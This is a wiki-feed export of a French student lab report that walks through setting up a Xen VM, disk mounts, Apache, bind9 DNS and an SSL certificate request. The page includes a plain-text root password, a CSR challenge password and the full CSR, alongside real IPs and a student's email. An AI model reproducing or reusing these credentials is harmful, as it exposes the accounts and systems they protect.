   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51112</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51112"/>
				<updated>2019-11-24T19:17:54Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Commande de base */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001.660.4401.60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
